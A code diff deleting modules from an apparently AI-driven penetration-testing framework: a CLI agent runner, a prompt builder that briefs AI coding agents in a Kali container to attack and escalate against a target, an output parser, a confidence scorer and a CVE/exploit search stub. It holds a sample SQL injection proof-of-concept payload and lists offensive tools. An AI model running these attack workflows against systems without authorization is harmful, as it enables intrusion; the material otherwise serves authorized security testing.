# Check stale timeout (no output for too long)
stale_elapsed = time.time() - self._last_output_time
if stale_elapsed > self.stale_timeout:
await self._log("warning", f"No output for {int(stale_elapsed)}s, stopping")
await self._kill_cli_process()
break
# AI extraction on accumulated unparsed text (every 5 min)
if (time.time() - last_ai_extract > self.ai_extract_interval
and self.llm and self._parser.get_unparsed_text(clear=False)):
last_ai_extract = time.time()
await self._run_ai_extraction(all_findings)
# Check if CLI process is still running
if not await self._is_process_alive():
await self._log("info", "CLI process has exited")
# Read any remaining output
remaining = await self._read_new_output()
if remaining:
raw_output_parts.append(remaining)
parsed = self._parser.parse_chunk(remaining)
for finding in parsed:
finding_dict = finding.to_dict()
finding_dict["affected_endpoint"] = finding_dict.get("affected_endpoint") or self.target
all_findings.append(finding_dict)
if self.finding_callback:
try:
await self.finding_callback(finding_dict)
except Exception:
pass
break
# Update progress (time-based heuristic)
pct = min(90, 10 + int((elapsed / self.max_runtime) * 80))
phase = f"{self._provider.name} testing ({int(elapsed)}s)"
if self._parser.phases:
phase = f"{self._parser.phases[-1]} ({int(elapsed)}s)"
await self._progress(pct, phase)
await asyncio.sleep(self.poll_interval)
# Final AI extraction on any remaining unparsed text
if self.llm:
await self._run_ai_extraction(all_findings)
# Get exit code
exit_code = -1
try:
if self._cli_pid:
result = await self._sandbox.execute_raw(
f"wait {self._cli_pid} 2>/dev/null; echo $?", timeout=5
)
code = result.stdout.strip().split('\n')[-1].strip()
if code.isdigit():
exit_code = int(code)
except Exception:
pass
duration = time.time() - self._start_time
raw_output = "\n".join(raw_output_parts)
await self._log("info",
f"Completed: {len(all_findings)} findings, "
f"{self._parser.total_findings} total parsed, "
f"{int(duration)}s elapsed")
await self._progress(95, "CLI Agent complete")
return CLIAgentResult(
findings=all_findings,
raw_output=raw_output[:500000], # Cap raw output at 500KB
duration=duration,
exit_code=exit_code,
phases_completed=self._parser.phases,
total_output_lines=len(self._all_output),
cli_provider=self.cli_provider_id,
)
async def _read_new_output(self) -> str:
"""Read new output from the CLI's log file since last check."""
try:
# Use dd to read from offset (more reliable than tail -c +N)
result = await self._sandbox.execute_raw(
f"dd if={self.OUTPUT_LOG} bs=1 skip={self._output_offset} 2>/dev/null",
timeout=10,
)
if result.stdout:
self._output_offset += len(result.stdout.encode('utf-8'))
self._all_output.extend(result.stdout.split('\n'))
return result.stdout
except Exception as e:
logger.debug(f"[CLI-AGENT] Read output error: {e}")
return ""
async def _is_process_alive(self) -> bool:
"""Check if the CLI process is still running."""
if not self._cli_pid:
return False
try:
result = await self._sandbox.execute_raw(
f"kill -0 {self._cli_pid} 2>/dev/null && echo alive || echo dead",
timeout=5,
)
return "alive" in result.stdout
except Exception:
return False
async def _kill_cli_process(self):
"""Kill the CLI process in the container."""
if not self._cli_pid or not self._sandbox:
return
try:
await self._sandbox.execute_raw(
f"kill {self._cli_pid} 2>/dev/null; sleep 1; kill -9 {self._cli_pid} 2>/dev/null",
timeout=10,
)
await self._log("info", f"CLI process {self._cli_pid} killed")
except Exception as e:
logger.debug(f"[CLI-AGENT] Kill error: {e}")
async def _run_ai_extraction(self, all_findings: List[Dict]):
"""Run AI-assisted finding extraction on unparsed text."""
unparsed = self._parser.get_unparsed_text(clear=True)
if not unparsed or len(unparsed) < 200:
return
try:
from backend.core.cli_output_parser import ai_extract_findings
ai_findings = await ai_extract_findings(unparsed, self.llm)
for finding in ai_findings:
finding_dict = finding.to_dict()
# Check for duplicates
h = f"{finding.title}|{finding.endpoint}|{finding.severity}"
existing_hashes = {
f"{f.get('title', '')}|{f.get('affected_endpoint', '')}|{f.get('severity', '')}"
for f in all_findings
}
if h not in existing_hashes:
finding_dict["affected_endpoint"] = finding_dict.get("affected_endpoint") or self.target
all_findings.append(finding_dict)
if self.finding_callback:
try:
await self.finding_callback(finding_dict)
except Exception:
pass
await self._log("success",
f"AI-extracted: {finding.title} [{finding.severity.upper()}]")
except Exception as e:
logger.debug(f"[CLI-AGENT] AI extraction error: {e}")
# ── Status ──────────────────────────────────────────────────────────────
def get_status(self) -> Dict:
"""Return current runner status."""
elapsed = time.time() - self._start_time if self._start_time else 0
return {
"provider": self.cli_provider_id,
"provider_name": self._provider.name if self._provider else "",
"target": self.target,
"running": self._cli_pid is not None and not self._cancelled,
"elapsed": int(elapsed),
"findings_count": self._parser.total_findings,
"phases": self._parser.phases,
"output_lines": len(self._all_output),
"is_complete": self._parser.is_complete,
}
@@ -1,224 +0,0 @@
"""
CLI Instructions Builder - Generates prompt files for CLI agents inside Kali containers.
Creates:
1. instructions.md - Master prompt with target, output format, rules
2. CLAUDE.md - Auto-loaded project context for Claude Code CLI
3. .gemini (or equivalent) for other CLI tools
"""
import os
import json
import logging
from typing import Dict, Optional, List
logger = logging.getLogger(__name__)
# Pre-installed tools in the Kali container
KALI_TOOLS_PREINSTALLED = [
"nmap", "nuclei", "httpx", "sqlmap", "nikto", "ffuf", "gobuster",
"subfinder", "katana", "dnsx", "dalfox", "waybackurls", "uncover",
"masscan", "whatweb", "curl", "wget", "python3", "git", "jq",
"dig", "whois", "netcat",
]
KALI_TOOLS_INSTALLABLE = [
"wpscan", "dirb", "hydra", "john", "hashcat", "testssl.sh", "sslscan",
"enum4linux", "dnsrecon", "fierce", "amass", "medusa",
"dirsearch", "wfuzz", "arjun", "wafw00f", "sslyze", "commix",
"gau", "gitleaks", "httprobe",
]
def build_instructions(
target: str,
auth_headers: Optional[Dict] = None,
methodology_path: str = "/opt/pentest/methodology.md",
extra_context: Optional[str] = None,
) -> str:
"""Build the master instructions file for the CLI agent."""
auth_section = ""
if auth_headers:
auth_section = f"""## Authentication
Use these headers in ALL requests:
```
{json.dumps(auth_headers, indent=2)}
```
"""
else:
auth_section = """## Authentication
No authentication provided. Test unauthenticated access only.
If you discover login forms, note them but do NOT attempt brute-force without auth credentials.
"""
extra_section = ""
if extra_context:
extra_section = f"""## Additional Context
{extra_context}
"""
return f"""# AUTOMATED PENETRATION TEST - MISSION BRIEFING
## Target
{target}
{auth_section}
## Your Mission
You are an expert penetration tester conducting a comprehensive security assessment against the target above.
You have full access to a Kali Linux environment with all tools pre-installed.
## Methodology
Read and follow the comprehensive methodology file at: {methodology_path}
Execute each phase systematically. Do not skip phases.
{extra_section}
## Available Tools
**Pre-installed** (use directly):
{', '.join(KALI_TOOLS_PREINSTALLED)}
**Installable on-demand** (use `apt-get install -y <tool>` or `pip3 install <tool>`):
{', '.join(KALI_TOOLS_INSTALLABLE)}
You can also install any other tool available in Kali repositories.
## CRITICAL: Output Format for Findings
When you discover and CONFIRM a vulnerability, output it in EXACTLY this format:
===FINDING_START===
{{
"title": "SQL Injection in login endpoint",
"severity": "critical",
"vulnerability_type": "sqli_error",
"endpoint": "{target}/api/login",
"parameter": "username",
"evidence": "The response contained: You have an error in your SQL syntax...",
"poc_code": "curl -X POST '{target}/api/login' -d 'username=admin\\'--&password=x'",
"request": "POST /api/login HTTP/1.1\\nHost: ...\\nContent-Type: application/x-www-form-urlencoded\\n\\nusername=admin'--&password=x",
"response": "HTTP/1.1 500 Internal Server Error\\n...\\n{{\\"error\\": \\"SQL syntax error near...\\"}}",
"impact": "An attacker can extract all database contents including user credentials",
"cvss_score": 9.8
}}
===FINDING_END===
## Phase Progress Tracking
Mark each phase with:
```
echo "[PHASE] Starting Phase N: Description"
```
When ALL testing is complete:
```
echo "[COMPLETE] Penetration test finished"
```
## Rules
1. **VERIFY before reporting**: Only output findings with REAL evidence (actual HTTP responses, error messages, data leakage). Do NOT report theoretical vulnerabilities.
2. **Be thorough**: Test ALL phases in the methodology. Test every endpoint, parameter, and header you discover.
3. **Output immediately**: Report each finding as soon as you confirm it. Don't wait until the end.
4. **Include real evidence**: Copy actual HTTP requests/responses in the finding. Show the exact command that confirmed the vulnerability.
5. **Use multiple tools**: Cross-validate findings with different tools when possible (e.g., confirm SQLi with both manual testing AND sqlmap).
6. **Follow the methodology**: The methodology file contains detailed testing procedures for 100+ vulnerability types. Follow it step by step.
7. **Escalate findings**: If you find a low-severity issue, check if it can be escalated (e.g., information disclosure credential access admin takeover).
8. **Document everything**: Even if a test is negative, log what you tested so we know the coverage.
9. **Time management**: Spend more time on high-risk areas (auth, injection, file access) and less on informational checks.
10. **No hallucination**: If a tool produces no output or an error, report what happened honestly. Do NOT fabricate results.
## Vulnerability Types to Test (Priority Order)
**Critical Priority**: SQL Injection, Command Injection, SSRF, XXE, File Upload, Auth Bypass, IDOR
**High Priority**: XSS (Reflected, Stored, DOM), SSTI, Path Traversal, LFI/RFI, CSRF, JWT Manipulation
**Medium Priority**: Open Redirect, CORS Misconfiguration, CRLF Injection, Rate Limiting, Information Disclosure
**Lower Priority**: Security Headers, SSL/TLS Issues, Clickjacking, Directory Listing, HTTP Methods
## Start Now
Begin by reading {methodology_path}, then:
1. Reconnaissance: Probe the target, discover endpoints, detect technologies
2. Map the attack surface: Forms, APIs, parameters, headers, cookies
3. Test systematically: Follow the methodology phase by phase
4. Report findings: Output each confirmed vulnerability in the format above
"""
def build_claude_md(target: str, auth_headers: Optional[Dict] = None) -> str:
"""Build CLAUDE.md file (auto-read by Claude Code CLI as project context)."""
auth_note = ""
if auth_headers:
auth_note = f"\nAuthentication headers are provided in instructions.md."
return f"""# Penetration Testing Agent - Project Context
## Mission
Comprehensive penetration test against: {target}
{auth_note}
## Working Directory
- `/opt/pentest/methodology.md` - Full testing methodology (READ THIS FIRST)
- `/opt/pentest/instructions.md` - Target details, output format, rules
- `/opt/pentest/output.log` - Your output is being captured here
## Output Format
For EVERY confirmed vulnerability, output between markers:
===FINDING_START===
{{"title": "...", "severity": "critical|high|medium|low|info", "vulnerability_type": "...", "endpoint": "...", "evidence": "...", "poc_code": "..."}}
===FINDING_END===
## Key Rules
- ONLY report CONFIRMED vulnerabilities with real evidence
- Include actual HTTP requests/responses as proof
- Use Kali Linux tools (nmap, nuclei, sqlmap, ffuf, etc.)
- Follow the methodology systematically
- Mark phases: echo "[PHASE] Starting Phase N: ..."
- When done: echo "[COMPLETE] Penetration test finished"
## Environment
- Kali Linux with full toolset
- Network access to target
- All Kali tools available (install more with apt-get if needed)
"""
def build_gemini_instructions(target: str, auth_headers: Optional[Dict] = None) -> str:
"""Build instructions optimized for Gemini CLI."""
# Gemini CLI uses GEMINI.md or similar - same content, adapted format
return build_claude_md(target, auth_headers)
def load_methodology(methodology_path: str) -> str:
"""Load methodology file content."""
if not methodology_path:
return ""
# Resolve environment variable
if methodology_path.startswith("$"):
var_name = methodology_path.lstrip("$").strip("{}")
methodology_path = os.getenv(var_name, "")
if not methodology_path or not os.path.exists(methodology_path):
# Try common locations
common_paths = [
"/opt/Prompts-PenTest/pentestcompleto_en.md",
"/opt/Prompts-PenTest/pentestcompleto.md",
"/opt/Prompts-PenTest/PROMPT_PENTEST_FINAL_COMPLETO.md",
]
for path in common_paths:
if os.path.exists(path):
methodology_path = path
break
else:
logger.warning("[CLI-BUILDER] No methodology file found")
return ""
try:
with open(methodology_path, "r", encoding="utf-8") as f:
content = f.read()
logger.info(f"[CLI-BUILDER] Loaded methodology: {methodology_path} ({len(content)} chars)")
return content
except Exception as e:
logger.error(f"[CLI-BUILDER] Failed to load methodology: {e}")
return ""
@@ -1,457 +0,0 @@
"""
CLI Output Parser - 3-tier finding extraction from CLI agent output.
Tier 1: JSON marker blocks (===FINDING_START=== / ===FINDING_END===)
Tier 2: Regex patterns for known tool output formats (nuclei, nmap, sqlmap)
Tier 3: AI-assisted extraction via LLM for unstructured text
"""
import json
import re
import logging
from dataclasses import dataclass, field
from typing import List, Dict, Optional, Set
logger = logging.getLogger(__name__)
# JSON finding markers used in CLI instructions
FINDING_START = "===FINDING_START==="
FINDING_END = "===FINDING_END==="
# Progress markers
PHASE_PATTERN = re.compile(r'\[PHASE\]\s*(.+)', re.IGNORECASE)
COMPLETE_PATTERN = re.compile(r'\[COMPLETE\]', re.IGNORECASE)
PROGRESS_PATTERN = re.compile(r'\[PROGRESS\]\s*(\d+)%?\s*(.*)', re.IGNORECASE)
# Severity keywords for regex extraction
SEVERITY_MAP = {
"critical": "critical", "crit": "critical",
"high": "high",
"medium": "medium", "med": "medium",
"low": "low",
"info": "info", "informational": "info",
}
# Nuclei JSONL output pattern
NUCLEI_JSON_PATTERN = re.compile(r'^\{.*"template-id".*"matched-at".*\}$', re.MULTILINE)
# Generic vulnerability patterns in CLI output
VULN_PATTERNS = [
# [VULNERABILITY] Title - Severity
re.compile(
r'\[(?:VULNERABILITY|VULN|FINDING|ALERT)\]\s*(.+?)(?:\s*[-]\s*(critical|high|medium|low|info))?$',
re.IGNORECASE | re.MULTILINE
),
# SQLMap style: Parameter 'X' is vulnerable
re.compile(
r"(?:Parameter|Param)\s+['\"]?(\w+)['\"]?\s+(?:is|appears)\s+(?:vulnerable|injectable)",
re.IGNORECASE
),
# Nuclei text: [severity] [template-id] URL
re.compile(
r'\[(critical|high|medium|low|info)\]\s*\[([^\]]+)\]\s*(https?://\S+)',
re.IGNORECASE
),
]
@dataclass
class ParsedFinding:
"""A finding extracted from CLI output."""
title: str
severity: str = "medium"
vulnerability_type: str = ""
endpoint: str = ""
parameter: str = ""
evidence: str = ""
poc_code: str = ""
request: str = ""
response: str = ""
impact: str = ""
cvss_score: Optional[float] = None
source: str = "cli_agent"
def to_dict(self) -> Dict:
d = {
"title": self.title,
"severity": self.severity,
"vulnerability_type": self.vulnerability_type or self._infer_vuln_type(),
"affected_endpoint": self.endpoint,
"parameter": self.parameter,
"evidence": self.evidence,
"poc_code": self.poc_code,
"request": self.request,
"response": self.response,
"impact": self.impact,
"source": self.source,
"ai_status": "confirmed",
"ai_verified": True,
"confidence_score": 70,
}
if self.cvss_score:
d["cvss_score"] = self.cvss_score
return d
def _infer_vuln_type(self) -> str:
"""Infer vulnerability type from title keywords."""
title_lower = self.title.lower()
type_map = {
"sql injection": "sqli_error", "sqli": "sqli_error",
"xss": "xss_reflected", "cross-site scripting": "xss_reflected",
"stored xss": "xss_stored", "dom xss": "xss_dom",
"command injection": "command_injection", "rce": "command_injection",
"ssrf": "ssrf", "server-side request": "ssrf",
"lfi": "lfi", "local file": "lfi", "path traversal": "path_traversal",
"rfi": "rfi", "remote file": "rfi",
"xxe": "xxe", "xml external": "xxe",
"ssti": "ssti", "template injection": "ssti",
"csrf": "csrf", "cross-site request": "csrf",
"idor": "idor", "insecure direct": "idor",
"open redirect": "open_redirect",
"file upload": "file_upload",
"directory listing": "directory_listing",
"information disclosure": "information_disclosure",
"sensitive data": "sensitive_data_exposure",
"security header": "security_headers",
"ssl": "ssl_issues", "tls": "ssl_issues",
"cors": "cors_misconfig",
"crlf": "crlf_injection",
"nosql": "nosql_injection",
"ldap": "ldap_injection",
"jwt": "jwt_manipulation",
"auth bypass": "auth_bypass",
"brute force": "brute_force",
"rate limit": "rate_limit_bypass",
"clickjacking": "clickjacking",
"http smuggling": "http_smuggling",
"cache poison": "cache_poisoning",
"deserialization": "insecure_deserialization",
"prototype pollution": "prototype_pollution",
"graphql": "graphql_injection",
"host header": "host_header_injection",
"race condition": "race_condition",
"business logic": "business_logic",
}
for keyword, vtype in type_map.items():
if keyword in title_lower:
return vtype
return "unknown"
class CLIOutputParser:
"""3-tier output parser for CLI agent findings."""
def __init__(self):
self._seen_finding_hashes: Set[str] = set()
self._buffer = "" # Accumulates partial JSON blocks across chunks
self._unparsed_chunks: List[str] = []
self._total_findings = 0
self._phases_seen: List[str] = []
self._is_complete = False
def parse_chunk(self, text: str) -> List[ParsedFinding]:
"""Parse a chunk of CLI output. Returns newly extracted findings."""
if not text or not text.strip():
return []
findings: List[ParsedFinding] = []
# Track progress markers
for m in PHASE_PATTERN.finditer(text):
phase = m.group(1).strip()
if phase not in self._phases_seen:
self._phases_seen.append(phase)
logger.info(f"[CLI-PARSER] Phase: {phase}")
if COMPLETE_PATTERN.search(text):
self._is_complete = True
# Tier 1: JSON marker blocks
combined = self._buffer + text
tier1 = self._extract_json_markers(combined)
findings.extend(tier1)
# Tier 2: Regex patterns
tier2 = self._extract_regex_findings(text)
findings.extend(tier2)
# Tier 2b: Nuclei JSONL
tier2b = self._extract_nuclei_jsonl(text)
findings.extend(tier2b)
# Track unparsed text for later AI extraction
if not tier1 and not tier2 and not tier2b:
if len(text.strip()) > 50:
self._unparsed_chunks.append(text)
# Deduplicate
unique = []
for f in findings:
h = f"{f.title}|{f.endpoint}|{f.severity}"
if h not in self._seen_finding_hashes:
self._seen_finding_hashes.add(h)
unique.append(f)
self._total_findings += 1
return unique
def get_unparsed_text(self, clear: bool = True) -> str:
"""Get accumulated unparsed text for AI extraction."""
text = "\n".join(self._unparsed_chunks)
if clear:
self._unparsed_chunks = []
return text
@property
def is_complete(self) -> bool:
return self._is_complete
@property
def phases(self) -> List[str]:
return self._phases_seen
@property
def total_findings(self) -> int:
return self._total_findings
def _extract_json_markers(self, text: str) -> List[ParsedFinding]:
"""Tier 1: Extract findings from ===FINDING_START=== / ===FINDING_END=== blocks."""
findings = []
remaining_buffer = ""
# Find all complete blocks
parts = text.split(FINDING_START)
for i, part in enumerate(parts):
if i == 0:
continue # Text before first marker
if FINDING_END in part:
json_text, after = part.split(FINDING_END, 1)
json_text = json_text.strip()
try:
data = json.loads(json_text)
f = self._json_to_finding(data)
if f:
findings.append(f)
except json.JSONDecodeError:
# Try to fix common JSON issues
fixed = self._try_fix_json(json_text)
if fixed:
f = self._json_to_finding(fixed)
if f:
findings.append(f)
else:
logger.debug(f"[CLI-PARSER] Invalid JSON in marker block: {json_text[:100]}")
else:
# Incomplete block - save to buffer for next chunk
remaining_buffer = FINDING_START + part
self._buffer = remaining_buffer
return findings
def _extract_regex_findings(self, text: str) -> List[ParsedFinding]:
"""Tier 2: Extract findings using regex patterns."""
findings = []
for pattern in VULN_PATTERNS:
for match in pattern.finditer(text):
groups = match.groups()
if len(groups) >= 1:
title = groups[0].strip()
severity = "medium"
endpoint = ""
if len(groups) >= 2 and groups[1]:
sev = groups[1].lower().strip()
severity = SEVERITY_MAP.get(sev, "medium")
if len(groups) >= 3 and groups[2]:
endpoint = groups[2].strip()
# Skip very short or generic titles
if len(title) < 5 or title.lower() in ("n/a", "none", "test"):
continue
findings.append(ParsedFinding(
title=title,
severity=severity,
endpoint=endpoint,
evidence=match.group(0),
))
return findings
def _extract_nuclei_jsonl(self, text: str) -> List[ParsedFinding]:
"""Tier 2b: Extract findings from Nuclei JSONL output."""
findings = []
for match in NUCLEI_JSON_PATTERN.finditer(text):
try:
data = json.loads(match.group(0))
template_id = data.get("template-id", "")
matched_at = data.get("matched-at", "")
info = data.get("info", {})
severity = info.get("severity", "medium").lower()
name = info.get("name", template_id)
description = info.get("description", "")
findings.append(ParsedFinding(
title=f"[Nuclei] {name}",
severity=SEVERITY_MAP.get(severity, "medium"),
vulnerability_type=self._nuclei_to_vuln_type(template_id),
endpoint=matched_at,
evidence=f"Template: {template_id}\n{description}",
poc_code=f"nuclei -t {template_id} -u {matched_at}",
))
except json.JSONDecodeError:
continue
return findings
def _json_to_finding(self, data: Dict) -> Optional[ParsedFinding]:
"""Convert a JSON dict to ParsedFinding."""
title = data.get("title", "").strip()
if not title:
return None
severity = data.get("severity", "medium").lower()
severity = SEVERITY_MAP.get(severity, severity)
if severity not in ("critical", "high", "medium", "low", "info"):
severity = "medium"
return ParsedFinding(
title=title,
severity=severity,
vulnerability_type=data.get("vulnerability_type", ""),
endpoint=data.get("endpoint", data.get("affected_endpoint", "")),
parameter=data.get("parameter", ""),
evidence=data.get("evidence", ""),
poc_code=data.get("poc_code", data.get("poc", "")),
request=data.get("request", ""),
response=data.get("response", ""),
impact=data.get("impact", ""),
cvss_score=data.get("cvss_score"),
)
@staticmethod
def _try_fix_json(text: str) -> Optional[Dict]:
"""Try to fix common JSON issues."""
# Remove trailing commas
fixed = re.sub(r',\s*}', '}', text)
fixed = re.sub(r',\s*]', ']', fixed)
# Try to parse
try:
return json.loads(fixed)
except json.JSONDecodeError:
pass
# Try wrapping in braces
if not fixed.startswith('{'):
try:
return json.loads('{' + fixed + '}')
except json.JSONDecodeError:
pass
return None
@staticmethod
def _nuclei_to_vuln_type(template_id: str) -> str:
"""Map nuclei template ID to vulnerability type."""
tid = template_id.lower()
mappings = {
"sqli": "sqli_error", "sql-injection": "sqli_error",
"xss": "xss_reflected", "cross-site-scripting": "xss_reflected",
"ssrf": "ssrf", "server-side-request": "ssrf",
"lfi": "lfi", "local-file": "lfi",
"rfi": "rfi", "remote-file": "rfi",
"rce": "command_injection", "command-injection": "command_injection",
"ssti": "ssti", "template-injection": "ssti",
"xxe": "xxe", "xml-external": "xxe",
"redirect": "open_redirect",
"cors": "cors_misconfig",
"crlf": "crlf_injection",
"csrf": "csrf",
"header-injection": "header_injection",
"directory-listing": "directory_listing",
"info-disclosure": "information_disclosure",
"exposure": "sensitive_data_exposure",
"ssl": "ssl_issues", "tls": "ssl_issues",
"default-login": "default_credentials",
"misconfig": "security_headers",
}
for key, vtype in mappings.items():
if key in tid:
return vtype
return "unknown"
# AI-assisted extraction prompt template
AI_EXTRACT_PROMPT = """Analyze this penetration testing CLI output and extract any CONFIRMED vulnerability findings.
IMPORTANT: Only extract findings where there is clear evidence of a vulnerability (error messages,
data leakage, successful exploitation). Do NOT extract theoretical or untested issues.
CLI Output:
{output}
For each confirmed finding, provide:
- title: concise vulnerability name
- severity: critical|high|medium|low|info
- vulnerability_type: e.g., sqli_error, xss_reflected, ssrf, command_injection, etc.
- endpoint: the affected URL
- parameter: affected parameter (if applicable)
- evidence: the actual proof (HTTP response, error, data leaked)
- poc_code: the command or request that confirmed it
Respond ONLY with valid JSON:
{{"findings": [{{"title": "...", "severity": "...", "vulnerability_type": "...", "endpoint": "...", "parameter": "...", "evidence": "...", "poc_code": "..."}}]}}
If no confirmed findings, respond: {{"findings": []}}"""
async def ai_extract_findings(text: str, llm, max_chars: int = 8000) -> List[ParsedFinding]:
"""Tier 3: AI-assisted extraction of findings from unstructured CLI output."""
if not text or len(text.strip()) < 100:
return []
# Truncate to max_chars
if len(text) > max_chars:
text = text[:max_chars] + "\n... [truncated]"
prompt = AI_EXTRACT_PROMPT.format(output=text)
try:
response = await llm.generate(
prompt=prompt,
system="You are a security finding extractor. Extract only confirmed vulnerabilities with real evidence.",
max_tokens=2000,
)
if not response:
return []
# Extract JSON from response
json_match = re.search(r'\{.*"findings".*\}', response, re.DOTALL)
if not json_match:
return []
data = json.loads(json_match.group(0))
findings_data = data.get("findings", [])
findings = []
for fd in findings_data:
if not fd.get("title"):
continue
findings.append(ParsedFinding(
title=fd["title"],
severity=fd.get("severity", "medium"),
vulnerability_type=fd.get("vulnerability_type", ""),
endpoint=fd.get("endpoint", ""),
parameter=fd.get("parameter", ""),
evidence=fd.get("evidence", ""),
poc_code=fd.get("poc_code", ""),
))
logger.info(f"[CLI-PARSER] AI extracted {len(findings)} findings")
return findings
except Exception as e:
logger.warning(f"[CLI-PARSER] AI extraction failed: {e}")
return []
@@ -1,179 +0,0 @@
"""
NeuroSploit v3 - Confidence Scoring Engine
Numeric 0-100 confidence scoring for vulnerability findings.
Combines proof of execution, negative control results, and signal analysis
into a single score with transparent breakdown.
Score Thresholds:
>= 90 "confirmed" (AI Verified, high confidence)
>= 60 "likely" (needs manual review)
< 60 "rejected" (auto-reject, false positive)
"""
import logging
from dataclasses import dataclass, field
from typing import Dict, List, Optional
logger = logging.getLogger(__name__)
# ---------------------------------------------------------------------------
# Result types
# ---------------------------------------------------------------------------
@dataclass
class ConfidenceResult:
"""Result of confidence scoring."""
score: int # 0-100
verdict: str # "confirmed" | "likely" | "rejected"
breakdown: Dict[str, int] = field(default_factory=dict) # Component scores
detail: str = "" # Human-readable explanation
# ---------------------------------------------------------------------------
# Scorer
# ---------------------------------------------------------------------------
class ConfidenceScorer:
"""Calculates numeric confidence score 0-100 for vulnerability findings.
Weights:
+0-60 Proof of execution (per vuln type the most important signal)
+0-30 Proof of impact (severity-aware)
+0-20 Negative controls passed (response differs from benign)
-40 Only baseline diff signal (no actual proof of exploitation)
-60 Same behavior on negative controls (critical false positive indicator)
-40 AI interpretation says payload was ineffective
"""
# Threshold constants
THRESHOLD_CONFIRMED = 90
THRESHOLD_LIKELY = 60
# Weight caps
MAX_PROOF_SCORE = 60
MAX_IMPACT_SCORE = 30
MAX_CONTROLS_BONUS = 20
PENALTY_ONLY_DIFF = -40
PENALTY_SAME_BEHAVIOR = -60
PENALTY_AI_INEFFECTIVE = -40
# Keywords in AI interpretation that indicate payload was ineffective
INEFFECTIVE_KEYWORDS = [
"ignored", "not processed", "blocked", "filtered",
"sanitized", "rejected", "not executed", "was not",
"does not", "did not", "no effect", "no impact",
"benign", "safe", "harmless",
]
def calculate(
self,
signals: List[str],
proof_result, # ProofResult from proof_of_execution
control_result, # NegativeControlResult from negative_control
ai_interpretation: Optional[str] = None,
) -> ConfidenceResult:
"""Calculate confidence score from all verification components.
Args:
signals: List of signal names from multi_signal_verify
(e.g., ["baseline_diff", "payload_effect"])
proof_result: ProofResult from ProofOfExecution.check()
control_result: NegativeControlResult from NegativeControlEngine
ai_interpretation: Optional AI response interpretation text
Returns:
ConfidenceResult with score, verdict, breakdown, and detail
"""
breakdown: Dict[str, int] = {}
score = 0
# ── Component 1: Proof of Execution (0-60) ────────────────────
proof_score = min(proof_result.score, self.MAX_PROOF_SCORE) if proof_result else 0
score += proof_score
breakdown["proof_of_execution"] = proof_score
# ── Component 2: Proof of Impact (0-30) ───────────────────────
impact_score = 0
if proof_result and proof_result.proven:
if proof_result.impact_demonstrated:
impact_score = self.MAX_IMPACT_SCORE # Full impact shown
else:
impact_score = 15 # Proven but no impact demonstration
score += impact_score
breakdown["proof_of_impact"] = impact_score
# ── Component 3: Negative Controls (bonus/penalty) ─────────────
controls_score = 0
if control_result:
if control_result.same_behavior:
controls_score = self.PENALTY_SAME_BEHAVIOR # -60
else:
controls_score = min(
self.MAX_CONTROLS_BONUS,
control_result.confidence_adjustment
) # +20
score += controls_score
breakdown["negative_controls"] = controls_score
# ── Penalty: Only baseline diff signal ─────────────────────────
diff_penalty = 0
if signals and set(signals) <= {"baseline_diff", "new_errors"}:
# Only diff-based signals, no actual payload effect
if proof_score == 0:
diff_penalty = self.PENALTY_ONLY_DIFF # -40
score += diff_penalty
breakdown["diff_only_penalty"] = diff_penalty
# ── Penalty: AI says payload was ineffective ──────────────────
ai_penalty = 0
if ai_interpretation:
ai_lower = ai_interpretation.lower()
if any(kw in ai_lower for kw in self.INEFFECTIVE_KEYWORDS):
ai_penalty = self.PENALTY_AI_INEFFECTIVE # -40
score += ai_penalty
breakdown["ai_ineffective_penalty"] = ai_penalty
# ── Clamp and determine verdict ────────────────────────────────
score = max(0, min(100, score))
if score >= self.THRESHOLD_CONFIRMED:
verdict = "confirmed"
elif score >= self.THRESHOLD_LIKELY:
verdict = "likely"
else:
verdict = "rejected"
# Build detail string
detail_parts = []
if proof_result and proof_result.proven:
detail_parts.append(f"Proof: {proof_result.proof_type} ({proof_score}pts)")
else:
detail_parts.append("No proof of execution (0pts)")
if impact_score > 0:
detail_parts.append(f"Impact: +{impact_score}pts")
if control_result:
if control_result.same_behavior:
detail_parts.append(
f"NEGATIVE CONTROL FAIL: {control_result.controls_matching}/"
f"{control_result.controls_run} same behavior ({controls_score}pts)")
else:
detail_parts.append(f"Controls passed (+{controls_score}pts)")
if diff_penalty:
detail_parts.append(f"Only-diff penalty ({diff_penalty}pts)")
if ai_penalty:
detail_parts.append(f"AI-ineffective penalty ({ai_penalty}pts)")
detail = f"Score: {score}/100 [{verdict}] — " + "; ".join(detail_parts)
return ConfidenceResult(
score=score,
verdict=verdict,
breakdown=breakdown,
detail=detail,
)
-318
View File
@@ -1,318 +0,0 @@
"""
CVE and exploit search engine for NeuroSploitv2.
Extracts software versions from HTTP responses, queries NVD for known CVEs,
and searches GitHub for public exploit code. Fully async, self-contained.
"""
import asyncio
import logging
import re
import time
from dataclasses import dataclass, field
from typing import Dict, List, Optional, Tuple
try:
import aiohttp
except ImportError:
aiohttp = None # type: ignore[assignment]
logger = logging.getLogger(__name__)
# ── Dataclasses ───────────────────────────────────────────────────────────
@dataclass
class VersionInfo:
software: str
version: str
source: str # "server_header", "body", "meta_generator", etc.
@dataclass
class CVEResult:
cve_id: str
cvss_score: float
severity: str
description: str
cwe_id: str
affected_versions: str
published_date: str
@dataclass
class ExploitResult:
source: str # "github" or "exploitdb"
url: str
description: str
stars: int
language: str
@dataclass
class CVEFinding:
version_info: VersionInfo
cves: List[CVEResult] = field(default_factory=list)
exploits: List[ExploitResult] = field(default_factory=list)
# ── Regex patterns ────────────────────────────────────────────────────────
_SERVER_TOKEN_RE = re.compile(r"([A-Za-z][\w\.\-]*)/(\d+(?:\.\d+)+)")
_META_GENERATOR_RE = re.compile(
r'<meta[^>]+name=["\']generator["\'][^>]+content=["\']([^"\']+)["\']', re.I)
_JS_LIB_RE = re.compile(
r"(jquery|react|angular|vue|bootstrap|lodash|moment|backbone)"
r"[\-@/]?(\d+(?:\.\d+)+)", re.I)
_WP_VERSION_RE = re.compile(r'content=["\']WordPress\s+([\d.]+)', re.I)
_DRUPAL_VERSION_RE = re.compile(r'Drupal\s+([\d.]+)', re.I)
_JOOMLA_VERSION_RE = re.compile(
r'<meta[^>]+content=["\']Joomla!\s*-?\s*([\d.]+)', re.I)
_GENERIC_VERSION_RE = re.compile(
r"\b([A-Z][A-Za-z\-]+)\s+(?:version\s+)?v?(\d+\.\d+(?:\.\d+)?)\b")
_NVD_RPM_NO_KEY = 6
_NVD_RPM_WITH_KEY = 50
_REQUEST_TIMEOUT = 10
# ── CVEHunter ─────────────────────────────────────────────────────────────
class CVEHunter:
"""Async CVE and exploit search engine."""
